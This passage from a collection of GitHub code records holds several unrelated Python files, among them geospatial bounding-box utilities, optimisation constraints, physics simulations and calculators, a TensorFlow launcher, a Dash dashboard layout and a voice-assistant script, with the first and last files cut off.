else:\n antimeridian_bbox = None\n\n return antimeridian_bbox\n\n\ndef get_antimeridian_geometry_bbox(grouped_lons: Tuple[float],\n grouped_lats: Tuple[float]) -> BBox:\n \"\"\" Combine the longitudes and latitudes for a single GeoJSON geometry into\n a bounding box that encapsulates that geometry. The input to this\n function will already have been identified as crossing the\n antimeridian. The longitudes will be split into two groups either side\n of the antimeridian, so the westernmost point west of the antimeridian\n and the easternmost point east of the antimeridian can be found.\n\n This function assumes that, on average, those points east of the\n antimeridian will have a lower average longitude than those west of it.\n\n The output from this function will be a bounding box that also crosses\n the antimeridian.\n\n \"\"\"\n longitudes_group_one = [grouped_lons[0]]\n longitudes_group_two = []\n current_group = longitudes_group_one\n\n for previous_index, longitude in enumerate(grouped_lons[1:]):\n if crosses_antimeridian([longitude, grouped_lons[previous_index]]):\n if current_group == longitudes_group_one:\n current_group = longitudes_group_two\n else:\n current_group = longitudes_group_one\n\n current_group.append(longitude)\n\n if np.mean(longitudes_group_one) < np.mean(longitudes_group_two):\n east_lons = longitudes_group_one\n west_lons = longitudes_group_two\n else:\n east_lons = longitudes_group_two\n west_lons = longitudes_group_one\n\n return BBox(min(west_lons), min(grouped_lats), max(east_lons),\n max(grouped_lats))\n\n\ndef get_latitude_range(contiguous_bbox: Optional[BBox],\n antimeridian_bbox: Optional[BBox]) -> Tuple[float]:\n \"\"\" Retrieve the southern and northern extent for all bounding boxes. One\n of `contiguous_bbox` or `antimeridian_bbox` must not be `None`.\n\n * `contiguous_bbox`: A bounding box that minimally encompasses all\n GeoJSON geometries that do not cross the antimeridian.\n * `antimeridian_bbox`: A bounding box that minimally encompasses all\n GeoJSON geometries that _do_ cross the antimeridian.\n\n \"\"\"\n south_values = [bbox.south for bbox in [contiguous_bbox, antimeridian_bbox]\n if bbox is not None]\n north_values = [bbox.north for bbox in [contiguous_bbox, antimeridian_bbox]\n if bbox is not None]\n\n return min(south_values), max(north_values)\n\n\ndef bbox_in_longitude_range(bounding_box: BBox, west_limit: float,\n east_limit: float) -> bool:\n \"\"\" Check if the specified bounding box is entirely contained by the\n specified longitude range.\n\n This function is used to identify when geometries that do not cross the\n antimeridian are contained by the longitudinal range of those that do.\n\n \"\"\"\n return (west_limit <= bounding_box[0] <= east_limit\n and west_limit <= bounding_box[2] <= east_limit)\n\n\ndef aggregate_all_geometries(geojson_input: GeoJSON) -> List[AggCoordinates]:\n \"\"\" Parse the input GeoJSON object, and identify all items within it\n containing geometries. When items containing geometries are identified,\n functions are called to aggregate the coordinates within each geometry\n and return a list of aggregated longitudes and latitudes for each\n geometry (or sub-geometry member, e.g., multiple points, linestrings or\n polygons).\n\n \"\"\"\n if 'coordinates' in geojson_input:\n # A Geometry object with a `coordinates` attribute, e.g., Point,\n # LineString, Polygon, etc.\n grouped_coords = aggregate_geometry_coordinates(\n geojson_input['coordinates']\n )\n elif 'geometries' in geojson_input:\n # A GeometryCollection geometry.\n grouped_coords = flatten_list([\n aggregate_geometry_coordinates(geometry['coordinates'])\n for geometry in geojson_input['geometries']\n ])\n elif ('geometry' in geojson_input\n and 'coordinates' in geojson_input['geometry']):\n # A GeoJSON Feature (e.g., Point, LineString, Polygon, etc)\n grouped_coords = aggregate_geometry_coordinates(\n geojson_input['geometry']['coordinates']\n )\n elif ('geometry' in geojson_input\n and 'geometries' in geojson_input['geometry']):\n # A GeoJSON Feature containing a GeometryCollection\n grouped_coords = flatten_list([\n aggregate_all_geometries(geometry)\n for geometry in geojson_input['geometry']['geometries']\n ])\n elif 'features' in geojson_input:\n # A GeoJSON FeatureCollection\n grouped_coords = flatten_list(aggregate_all_geometries(feature)\n for feature in geojson_input['features'])\n else:\n raise InvalidInputGeoJSON()\n\n return grouped_coords\n\n\ndef aggregate_geometry_coordinates(\n coordinates: Coordinates,\n aggregated_coordinates: List[AggCoordinates] = None\n) -> List[AggCoordinates]:\n \"\"\" Extract the aggregated latitude and longitude coordinates associated\n with all child items in the `coordinates` attribute of a GeoJSON\n geometry. The order of longitudes and latitudes are preserved to allow\n later checking for antimeridian crossing.\n\n Some geometries have multiple parts, such as MultiLineStrings or\n MultiPolygons. These each have their own entries in the output list,\n so that the bounding box of each can be derived independently. Keeping\n sub-geometries separate is important to avoid spurious identification\n of antimeridian crossing.\n\n Return value:\n\n [\n [(x_0, ..., x_M), (y_0, ..., y_M)], # For GeoJSON sub-geometry one\n [(x_0, ..., x_N), (y_0, ..., y_N)] # For GeoJSON sub-geometry two\n ]\n\n For geometry types: Point, LineString and Polygon, there will be only\n a single sub-geometry item in the returned list.\n\n \"\"\"\n if aggregated_coordinates is None:\n aggregated_coordinates = []\n\n if is_single_point(coordinates):\n aggregated_coordinates.append([(coordinates[0], ), (coordinates[1], )])\n elif is_list_of_coordinates(coordinates):\n aggregated_coordinates.append(list(zip(*coordinates)))\n else:\n for nested_coordinates in coordinates:\n aggregate_geometry_coordinates(nested_coordinates,\n aggregated_coordinates)\n\n return aggregated_coordinates\n\n\ndef is_list_of_coordinates(input_object) -> bool:\n \"\"\" Checks if the input contains a list of coordinates, which Python will\n represent as a list of lists of numerical values, e.g.:\n\n ```Python\n list_of_coordinates = [[0.1, 0.2], [0.3, 0.4]]\n ```\n\n \"\"\"\n return (isinstance(input_object, list)\n and all(is_single_point(element) for element in input_object))\n\n\ndef is_single_point(input_object) -> bool:\n \"\"\" Checks if the input is a single list of numbers. Note, coordinates may\n or may not include a vertical coordinate as a third element.\n\n \"\"\"\n return (isinstance(input_object, list)\n and len(input_object) in (2, 3)\n and all(isinstance(element, (float, int))\n for element in input_object))\n\n\ndef flatten_list(list_of_lists: List[List]) -> List:\n \"\"\" Flatten the top level of a list of lists, to combine all elements in\n the child lists to be child elements at the top level of the object.\n For example:\n\n Input: [[1, 2, 3], [4, 5, 6]]\n Output: [1, 2, 3, 4, 5, 6]\n\n \"\"\"\n return [item for sub_list in list_of_lists for item in sub_list]\n\n\ndef crosses_antimeridian(longitudes: List[Union[float, int]],\n longitude_threshold: float = 180.0) -> bool:\n \"\"\" Check if a specified list of ordered longitudes crosses the\n antimeridian (+/- 180 degrees east). This check assumes that any points\n that are separated by more than 180 degrees east in longitude will\n cross the antimeridian. There are edge-cases where this may not be\n true, but it is a common condition used in similar checks:\n\n https://towardsdatascience.com/around-the-world-in-80-lines-crossing-the-antimeridian-with-python-and-shapely-c87c9b6e1513\n\n \"\"\"\n return np.abs(np.diff(longitudes)).max() > longitude_threshold\n\n\ndef get_bounding_box_lon_lat(bounding_box: List[float]) -> BBox:\n \"\"\" Parse a GeoJSON bounding box attribute, and retrieve only the\n horizontal coordinates (West, South, East, North).\n\n \"\"\"\n if len(bounding_box) == 4:\n horizontal_bounding_box = BBox(*bounding_box)\n elif len(bounding_box) == 6:\n horizontal_bounding_box = BBox(bounding_box[0], bounding_box[1],\n bounding_box[3], bounding_box[4])\n else:\n raise InvalidInputGeoJSON()\n\n return horizontal_bounding_box\n","repo_name":"nasa/harmony-opendap-subsetter","sub_path":"hoss/bbox_utilities.py","file_name":"bbox_utilities.py","file_ext":"py","file_size_in_byte":16745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"3554987210","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport cvxpy as cp\nimport mosek\nimport matplotlib.pyplot as plt\nimport datetime as date\nfrom datetime import datetime as dt\nfrom dateutil.relativedelta import *\nimport scipy.stats\nfrom scipy.stats import rankdata\n\n\n# In[5]:\n\n\n######## The representations of the epigraph of the perspective of the phi conjugates: gamma*(phi^*)(s/gamma) <= t are given below for several\n##### phi functions\n\n##### the modified chi-squared function phi(x)= (x-1)^2\n\ndef mod_chi2_conj(gamma,s,t,w,constraints):\n constraints.append(cp.norm(cp.vstack([w,t/2]))<=(t+2*gamma)/2)\n constraints.append(s/2+gamma<= w)\n return(constraints)\n\n#### the kullback-leibler function phi(x) = xlog(x)-x+1 \n\ndef kb_conj(gamma,s,t,w,constraints):\n constraints.append(w - gamma <= t)\n constraints.append(cp.kl_div(gamma,w)+gamma+s-w<= 0)\n return(constraints)\n\n\n# In[3]:\n\n\n####### the constraints sum^N_{i=1}p_iphi(q_i/p_i) <= r is written here (in cvxpy syntax) for several phi functions\n\ndef mod_chi2_cut(p,q,r,par,constraints):\n N = p.shape[0]\n phi_cons = 0\n for i in range(N):\n phi_cons = phi_cons + 1/p[i]*(q[i]-p[i])**2\n constraints.append(phi_cons<=r)\n return(constraints)\n\ndef kb_cut(p,q,r,par,constraints):\n N = p.shape[0]\n phi_cons = 0\n for i in range(N):\n phi_cons = phi_cons -cp.entr(q[i]) - q[i]*np.log(p[i])\n constraints.append(phi_cons<=r)\n return(constraints)\n\n\n# In[6]:\n\n\n###### functions that evaluates phi functions\n\ndef kb_eva(p,q):\n N = len(p)\n phi = 0\n for i in range(N):\n if q[i]<= 0:\n phi = phi + 0\n else:\n phi = phi + q[i]*np.log(q[i]/p[i])\n return(phi)\n\ndef mod_chi2_eva(p,q):\n N = len(p)\n phi = 0\n for i in range(N):\n if p[i]== 0:\n return (np.inf)\n phi = phi + (p[i]-q[i])**2/p[i]\n return(phi)\n\n","repo_name":"GuanJinNL/ROptRDU.github.io","sub_path":"phi_divergence.py","file_name":"phi_divergence.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31166634858","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport traceback\n\nfrom model.model_lib.EstimatorWithFastEvaluate import EstimatorWithFastEvaluate\nfrom utils.utils import *\nfrom utils.config import TaskConfig\nfrom model.model_lib.estimator import Estimator\nimport tensorflow as tf\n\nflags = tf.app.flags\nflags.DEFINE_string(\"ps_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"worker_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"chief_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"evaluator_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"job_name\", \"chief\", \"One of 'ps', 'worker', 'chief', 'evaluator'\")\nflags.DEFINE_integer(\"task_index\", 0, \"Index of task within the job\")\n\nflags.DEFINE_string(\"task\", 'train', \"task: train_eval, train, evaluate or infer\")\nflags.DEFINE_string(\"model_dir\", \"s\", \"model_dir\")\n\nflags.DEFINE_string(\"config_file\", \"task_conf.json\", \"config name\")\nflags.DEFINE_string(\"data_struct_file\", \"data_struct.json\", \"data struct file name\")\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n logger = set_logger()\n\n task_config = TaskConfig(FLAGS.config_file, FLAGS.data_struct_file)\n init_environment(FLAGS, task_config.params, logger)\n\n model_class = import_class(task_config.params['model_class_name'])\n model = model_class(task_config.data_struct,\n task_config.params,\n logger,\n **task_config.params)\n if int(task_config.params['is_dist']) == 0 and int(task_config.params['local_debug']) == 1:\n run_config = init_single_run_config(FLAGS, task_config.params, logger)\n else:\n run_config = init_run_config(FLAGS, task_config.params, logger)\n estimator = EstimatorWithFastEvaluate(model, task_config.data_struct, run_config,\n logger, FLAGS, task_config.params)\n\n try:\n if FLAGS.task == 'train':\n estimator.train()\n elif FLAGS.task == 'evaluate':\n estimator.evaluate()\n elif FLAGS.task == 'infer':\n estimator.infer()\n else:\n raise ValueError('Run task not exist!')\n except Exception as e:\n exc_info = traceback.format_exc(sys.exc_info())\n msg = 'creating session exception:%s\\n%s' % (e, exc_info)\n tmp = 'Run called even after should_stop requested.'\n should_stop = type(e) == RuntimeError and str(e) == tmp\n if should_stop:\n logger.warn(msg)\n else:\n logger.error(msg)\n # 0 means 'be over', 1 means 'will retry'\n exit_code = 0 if should_stop else 1\n sys.exit(exit_code)\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"W-void/DSAIN","sub_path":"train_eval.py","file_name":"train_eval.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31497418700","text":"from scipy.integrate import odeint # for integrate.odeint\nfrom pylab import * # for plotting commands\n#1 is earth 2 is jup\nGM = (4*pi**2)\n#same order for x input into planets\nx1 = 2.52\ny1 = 0\nvx1 = 0\nvy1 = sqrt(GM/2.52)\nx2 = 5.24\ny2 = 0\nvx2 = 0\nvy2 = sqrt(GM/5.24)\n#\n#for python ODE\ndef planets(x,t):\n dxdt = zeros(size(x))\n r1 = sqrt(x[0]**2 + x[1]**2)\n r2 = sqrt(x[4]**2 + x[5]**2)\n r21 = sqrt((x[4] - x[0])**2 + (x[5] - x[1])**2)\n dxdt[0] = x[2]\n dxdt[1] = x[3]\n dxdt[2] = -(GM/r1**3)*x[0] + (0.04*GM/r21**3)*(x[4] - x[0])\n dxdt[3] = -(GM/r1**3)*x[1] + (0.04*GM/r21**3)*(x[5] - x[1])\n dxdt[4] = x[6]\n dxdt[5] = x[7]\n dxdt[6] = -(GM/r2**3)*x[4] - (0.001*GM/r21**3)*(x[4] - x[0])\n dxdt[7] = -(GM/r2**3)*x[5] - (0.001*GM/r21**3)*(x[5] - x[1])\n return dxdt\n#for my rungkutta because x and t are switched\ndef planet(t,x):\n dxdt = zeros(size(x))\n r1 = sqrt(x[0]**2 + x[1]**2)\n r2 = sqrt(x[4]**2 + x[5]**2)\n r21 = sqrt((x[4] - x[0])**2 + (x[5] - x[1])**2)\n dxdt[0] = x[2]\n dxdt[1] = x[3]\n dxdt[2] = -(GM/r1**3)*x[0] + (0.04*GM/r21**3)*(x[4] - x[0])\n dxdt[3] = -(GM/r1**3)*x[1] + (0.04*GM/r21**3)*(x[5] - x[1])\n dxdt[4] = x[6]\n dxdt[5] = x[7]\n dxdt[6] = -(GM/r2**3)*x[4] - (0.001*GM/r21**3)*(x[4] - x[0])\n dxdt[7] = -(GM/r2**3)*x[5] - (0.001*GM/r21**3)*(x[5] - x[1])\n return dxdt\n \n#ODE int\ndef RungKutta(x,f,t,dt):\n RK1 = f(t,x) * dt\n RK2 = f(t + dt/2, x + RK1/2) * dt\n RK3 = f(t + dt/2, x + RK2/2) * dt\n RK4 = f(t+ dt, x + RK3) * dt \n return x + (1.0/6.0)*(RK1 + 2*RK2 + 2*RK3 + RK4)\n \n#initial conditions\nstate = array([x1,y1,vx1,vy1,x2,y2,vx2,vy2])\ntimes = linspace(0,100,1000)\n \n#Rungkutta solution\nrk_sol = [state]\ndt = 0.1\nrk_time = [0]\nwhile rk_time[-1] < 100:\n rk_sol.append(RungKutta(rk_sol[-1],planet,rk_time[-1],dt))\n rk_time.append(rk_time[-1] + dt)\n \n#python ODE solver solution\nstates = odeint(planets,state,times)\n \nE_x = states[:,0]\nE_y = states[:,1]\nJ_x = states[:,4]\nJ_y = states[:,5]\n \n#energy conservation\ndef Energy(x,t):\n r1 = sqrt(x[0]**2 + x[1]**2)\n r2 = sqrt(x[4]**2 + x[5]**2)\n r21 = sqrt((x[4] - x[0])**2 + (x[5] - x[1])**2)\n v1sq = (x[2]**2 + x[3]**2)\n v2sq = (x[6]**2 + x[7]**2)\n return (0.5*0.001*v1sq) + (0.5*0.04*v2sq) - (0.001*GM/r1) - (0.04*GM/r2) - ((0.001*0.04*GM)/r21)\n#angular momentum\ndef Momentum(x,t):\n return 0.001*(x[0]*x[3] - x[1]*x[2]) + 0.04*(x[4]*x[7] - x[5]*x[6])\n \nEoverM = []\nfor i in range(len(times)):\n EoverM.append(Energy(states[i],times[i]))\n \nLoverM = []\nfor i in range(len(times)):\n LoverM.append(Momentum(states[i],times[i]))\n \n#plotting \nfig = plt.figure()\nax1 = fig.add_subplot(311)\nax1.plot(E_x,E_y,'or')\nax1.plot(J_x,J_y,'ob')\nplt.xlabel('Distances (A.U.)')\nplt.ylabel('Distances (A.U.)')\nlegend([\"Earth\", \"Jupiter\"])\nax2 = fig.add_subplot(312)\nax2.plot(times,EoverM,'ob')\nplt.xlabel('Time (yrs)')\nplt.ylabel('Energy/M')\nax3 = fig.add_subplot(313)\nax3.plot(times,LoverM,'ob')\nplt.xlabel('Time (yrs)')\nplt.ylabel('Angular Momentum/M')\nplt.show()","repo_name":"huginn-sim/nbody","sub_path":"planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43696340124","text":"import numpy\nfrom uncertainties import ufloat\n\n\nclass Unit(object):\n GeV = 1\n MeV = 1e-3 * GeV\n eV = 1e-9 * GeV\n s = 1. / 6.582119e-16 / eV\n\n\nclass BToMuNuCalculations(object):\n\n def __init__(self):\n \"\"\" Calculates the Standard Model prediction for the B -> l nu decay.\n\n K.A. Olive et al. (Particle Data Group), Chin. Phys. C, 38, 090001 (2014).\n - Fermi coupling constant\n - B-Meson mass\n - B-Meson lifetime\n - V_ub\n - Electron mass\n - Muon mass\n - Tau mass\n\n arXiv:1212.0586v1 [hep-lat].\n - Decay constant\n\n :return:\n \"\"\"\n self.fermi_coupling_constant = ufloat(1.1663786e-5 * Unit.GeV**-2, 0 * Unit.GeV**-2, tag=\"G_F\")\n self.b_meson_mass = ufloat(5279.26 * Unit.MeV, 0.17 * Unit.MeV, tag=\"M_B\")\n self.b_meson_lifetime = ufloat(1.638e-12 * Unit.s, 0.004e-12 * Unit.s, tag=\"tau_B\")\n self.decay_constant = ufloat(0.191 * Unit.GeV, 0.009 * Unit.GeV, tag=\"f_B\")\n # self.v_ub = ufloat(4.13e-3, 0.49e-3, tag=\"V_ub\") # PDG\n self.v_ub = ufloat(3.95e-3, numpy.sqrt(0.39e-3**2 + 0.38e-3**2), tag=\"V_ub\")\n self.electron_mass = ufloat(0.510998929 * Unit.MeV, 0.000000022 * Unit.MeV, tag=\"m_e\")\n self.muon_mass = ufloat(105.6583715 * Unit.MeV, 0.0000035 * Unit.MeV, tag=\"m_mu\")\n self.tau_mass = ufloat(1776.82 * Unit.MeV, 0.16 * Unit.MeV, tag=\"m_tau\")\n\n def standard_model_branching_ratio(self, lepton_mass):\n \"\"\" Standard Model prediction for the given lepton mass.\n Equation taken from Physics at the B-factories p.396.\n\n :param lepton_mass:\n :return: branching ratio\n \"\"\"\n return self.fermi_coupling_constant**2 * self.b_meson_mass * lepton_mass**2 / (8 * numpy.pi) \\\n * (1 - (lepton_mass / self.b_meson_mass)**2)**2 \\\n * self.decay_constant**2 * self.v_ub**2 * self.b_meson_lifetime\n\n def two_higgs_doublet_model_branching_ratio(self, lepton_mass, tan_beta, m_charged_higgs):\n r_h = (1 - self.b_meson_mass**2 * tan_beta**2 / m_charged_higgs**2)**2\n return self.standard_model_branching_ratio(lepton_mass) * r_h\n\nif __name__ == '__main__':\n calculator = BToMuNuCalculations()\n e = calculator.standard_model_branching_ratio(calculator.electron_mass)\n mu = calculator.standard_model_branching_ratio(calculator.muon_mass)\n tau = calculator.standard_model_branching_ratio(calculator.tau_mass)\n\n print(\"Standard Model branching ratio predictions:\")\n print(\"BR(B->e nu):\\t{:.2e}\".format(e))\n print(\"BR(B->mu nu):\\t{:.2e}\".format(mu))\n print(\"BR(B->tau nu):\\t{:.2e}\".format(tau))\n print()\n print(\"Electron and Muon helicity suppression compared to Tau Channel:\")\n print(\"BR(B->e nu) / BR(B->tau nu):\\t{:.2e}\".format(e/tau))\n print(\"BR(B->mu nu) / BR(B->tau nu):\\t{:.2e}\".format(mu/tau))\n print()\n N_BB = 772e6\n upsilon_to_b_charged_br = 0.514\n print(\"Signal yield N_sig^e = {}\".format(upsilon_to_b_charged_br * N_BB * e))\n print(\"Signal yield N_sig^mu = {}\".format(upsilon_to_b_charged_br * N_BB * mu))\n print(\"Signal yield N_sig^tau = {}\".format(upsilon_to_b_charged_br * N_BB * tau))\n","repo_name":"MarkusPrim/B_To_MuNu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72779517959","text":"num = float(input())\r\nif num<0.0001 or num>0.9999:\r\n\tprint (\"numero incorrecto\")\r\n\texit ()\r\ndenominador=10000\r\nnumerador=int(round(num*10000)) #rendondeo de número para resolver problema de coma flotante\r\nfor i in [4, 3, 2, 1, 0]:\r\n\tif numerador%2**i==0 and denominador%2**i==0:\r\n\t\tnumerador=numerador/2**i\r\n\t\tdenominador=denominador/2**i\r\n\t\r\nfor j in [4, 3, 2, 1, 0]:\r\n\r\n\tif numerador%5**j==0 and denominador%5**j==0:\r\n\t\tnumerador=numerador/5**j\r\n\t\tdenominador=denominador/5**j\r\n\r\nprint (\"%d/%d\" %(numerador, denominador))\r\n","repo_name":"Txus77/Prueba","sub_path":"prueba2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28473635507","text":"from collections import namedtuple\n\nimport dash_bootstrap_components as dbc\nfrom dash import dcc, html\n\n\ndef get_layout():\n return dbc.Container(\n [\n get_selector(),\n get_header(\"NGINX Dashboard\"),\n html.Hr(),\n *get_cards(),\n html.Br(),\n get_graphs(),\n ]\n )\n\n\ndef get_selector():\n label = dbc.Label(\"\")\n dropdown = dcc.Dropdown(\n id=\"date-range\",\n options=[\n {\"label\": f\"Last {days} days\", \"value\": days} for days in [7, 30, 120]\n ],\n value=7,\n style={\"marginTop\": 12},\n )\n\n return dbc.Row(\n [dbc.Col(label, md=1), dbc.Col(dropdown, md=3)], justify=\"end\", align=\"center\"\n )\n\n\ndef get_header(title):\n title = html.H1(title, style={\"marginTop\": 12})\n logo = html.Img(\n src=\"https://upload.wikimedia.org/wikipedia/commons/c/c5/Nginx_logo.svg\",\n style={\"float\": \"right\", \"height\": 30, \"marginTop\": 12},\n )\n return dbc.Row([dbc.Col(title, md=9), dbc.Col(logo, md=3)], align=\"center\")\n\n\ndef get_cards():\n CardConfig = namedtuple(\"CardConfig\", [\"id\", \"desc\", \"kwargs\"])\n\n card_configs = [\n CardConfig(\"total-requests\", \"Total Requests\", {\"color\": \"primary\"}),\n CardConfig(\"valid-requests\", \"Valid Requests\", {\"color\": \"success\"}),\n CardConfig(\"failed-requests\", \"Failed Requests\", {\"color\": \"warning\"}),\n CardConfig(\"unique-visitors\", \"Unique Visitors\", {\"color\": \"light\"}),\n CardConfig(\"referrers\", \"Referrers\", {\"color\": \"light\"}),\n CardConfig(\"not-found\", \"Not Found\", {\"color\": \"light\"}),\n ]\n\n cards = []\n for card_config in card_configs:\n card = dbc.Card(\n [\n html.H4(\"\", className=\"card-title\", id=card_config.id),\n html.P(card_config.desc, className=\"card-text\"),\n ],\n body=True,\n **card_config.kwargs,\n )\n\n cards.append(card)\n\n return [\n dbc.Row([dbc.Col(card, md=4) for card in cards[:3]]),\n html.Br(),\n dbc.Row([dbc.Col(card, md=4) for card in cards[3:]]),\n ]\n\n\ndef get_graphs():\n graph_1 = dcc.Graph(\"graph-1\")\n graph_2 = dcc.Graph(\"graph-2\")\n\n return dbc.Row(\n [\n dbc.Col(graph_1, xs=12, lg=6),\n dbc.Col(graph_2, xs=12, lg=6),\n ]\n )\n","repo_name":"chrisdeutsch/nginx-dashboard","sub_path":"nginx_dashboard/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24500949437","text":"#!/usr/bin/python3.7\n# coding=utf-8\n\"\"\"导入线程处理模块\"\"\"\nimport threading\n\"\"\"获得延时操作\"\"\"\nimport time\n\"\"\"只是用来代替执行终端指令和更改模块路径\"\"\"\nimport sys\n\"\"\"自建模块需要手动导入模块路径!\"\"\"\nsys.path.append(sys.path[0])\n\"\"\"语音识别模块\"\"\"\nfrom speak_Main import speaker\n\nimport snowboydecoder\nimport sys\nimport signal\nimport findWeather\n\n\nclass mainsnow():\n \n def __init__(self):\n self.interrupted = False\n self.mainCheck()\n \n def interrupt_callback(self):\n #global interrupted\n return self.interrupted\n\n def mainCheck(self):\n print(\"begin to check:\")\n model = \"小花.pmdl\"#sys.argv[1]\n # capture SIGINT signal, e.g., Ctrl+C\n #signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGINT, True)\n\n detector = snowboydecoder.HotwordDetector(model, sensitivity=0.45)\n print('Listening... Press Ctrl+C to exit')\n # main loop\n detector.start( detected_callback = snowboydecoder.play_audio_file,\n interrupt_check = self.interrupt_callback,\n sleep_time=0.03)\n detector.terminate()\n\n\n\"\"\"功能:程序会在此处等待,直到识别到语音唤醒程序,方便外部函数直接调用\"\"\"\ndef Wait_for_question():\n a = mainsnow()\n \n \ndef robot_question(Object):\n Wait_for_question()\n Object.paly_cloud_vice(\"嗯,怎么了\")\n value_input = Object.Sound_recording_2(sound_time = 3)\n \"\"\"由于可能没有识别结果可能会发生错误,需要在这里进行错误处理\"\"\"\n try: \n if \"关灯\" in value_input:\n Object.paly_cloud_vice(\"好\")\n return 1 \n elif \"开灯\" in value_input:\n Object.paly_cloud_vice(\"好的\")\n return 2\n elif \"天气\" in value_input:\n a = findWeather.return_weather()\n print(a)\n Object.paly_cloud_vice(\"今天的天气\")\n Object.paly_cloud_vice(a[\"现在天气\"][0])#a[\"现在天气\"][1]\n Object.paly_cloud_vice(a[\"现在天气\"][1])\n return 0\n elif \"数据\" in value_input:\n Object.paly_cloud_vice(\"没问题\")\n return 3\n elif \"聊天\" in value_input or \"聊聊天\" in value_input:\n return 4\n else:\n Object.paly_cloud_vice(\"你说啥\")\n except:\n \n return 0\n\nif __name__ == '__main__':\n while True:\n Speak = speaker()\n robot_question(Speak)","repo_name":"tianxiaohuahua/Home-management-platform-and-home-robot","sub_path":"1-raspi-robot/2-raspi-python-file/1-Tianxiaohua_Robot_main/snowbodyMain.py","file_name":"snowbodyMain.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"69832170442","text":"import random\r\nfrom time import time \r\n\r\ndef randomList(n):\r\n a = list(random.sample(range(1,1000000), n))\r\n b = list(random.sample(range(1000001, 2000000), n))\r\n c = list(random.sample(range(2000001, 3000000), n))\r\n return a,b,c\r\n\r\ndef isIntersect_1(a, b, c):\r\n for number in a:\r\n if number in b and number in c:\r\n return True\r\n return False\r\n\r\ndef isIntersect_2(a, b, c):\r\n for i in range(0, len(a)): \r\n for j in range(0, len(b)):\r\n for k in range(0, len(c)):\r\n if c[k] == b[j] == a[i]:\r\n return True\r\n return False\r\n\r\ndef analyze_algo(n):\r\n a,b,c = randomList(n)\r\n start_time = time()\r\n isIntersect_2(a, b, c)\r\n end_time = time() \r\n elapsed = end_time - start_time \r\n print(\"execution time:\", elapsed)\r\n\r\ndef main():\r\n analyze_algo(100) #100 1000 10000 100000\r\n\r\nmain()\r\n# def analyze_algo(n):\r\n# #stime = time()\r\n# a,b,c = randomList(n)\r\n #etime = time()\r\n #elapsed = etime - stime\r\n #print(\"create list time: \", elapsed)\r\n\r\n # print(n)\r\n\r\n# stime = time()\r\n# etime = time()\r\n# elapsed = etime - stime\r\n# print(\"execution time isintersect1: \", elapsed)\r\n\r\n# stime = time()\r\n# etime = time()\r\n# elapsed = etime - stime\r\n# print(\"execution time isintersect2: \", elapsed)\r\n\r\n# analyze_algo(10000)\r\n","repo_name":"EIKZAZ/DSA_Y1T2","sub_path":"LAB072.py","file_name":"LAB072.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35565387339","text":"import os\nimport glob\nimport csv\nimport copy\nimport re\n\ndef get_immediate_subdirectories(a_dir):\n return [name for name in os.listdir(a_dir)\n if os.path.isdir(os.path.join(a_dir, name))]\n\ndirs = get_immediate_subdirectories('/Users/carsonlam/macroeyes/population1/' )\n\nlength = len(dirs)\n\nj = 0\n\ncsvname = 'meds'\n#folderpath = '/Users/carsonlam/macroeyes/population1/'\nfolderpath = '/Volumes/Seagate Backup Plus Drive/macroeyes/population1'\n\nfor direc in dirs:\n\n filepath = folderpath+str(direc)+'/'+ csvname +'.txt'\n\n if os.path.exists(filepath):\n\n #print(filepath)\n\n f = open(filepath, \"r\",encoding = 'iso-8859-1')\n\n readfile = csv.reader(f)\n\n filelist = list(readfile)\n\n f.close()\n\n #print(len(filelist))\n\n string = filelist[0][17]\n\n str_only = ''.join(i for i in string if not i.isdigit())\n\n num_only = int(re.search(r'\\d+', string).group())\n\n #print(string)\n #print(num_only)\n\n title = filelist[0][:17]\n\n title.append(str_only)\n\n endlist = filelist[0][17:]\n\n endlist[0] = num_only\n\n\n #print(title)\n #print(len(title))\n\n #print(endlist)\n #print(len(endlist))\n\n filelist[0]= endlist\n filelist.insert(0,title)\n\n #print(filelist[0])\n\n with open(filepath, \"w\") as myfile:\n for item in filelist:\n #print(item)\n item[0] =str(item[0])\n s=','\n item = s.join(item)\n #print(item)\n myfile.write(\"%s\\n\" % item)\n\n\n f = open(filepath, \"r\",encoding = 'iso-8859-1')\n\n readfile = csv.reader(f)\n\n filelist = list(readfile)\n\n f.close()\n\n #print(len(filelist))\n\n j+=1\n\n if j%1000 == 0:\n print(j/length)\n","repo_name":"clam004/macroeyes_data_digestion","sub_path":"reorgmeds.py","file_name":"reorgmeds.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27240367348","text":"\r\ndef solid_object(id, pos, rot=0, 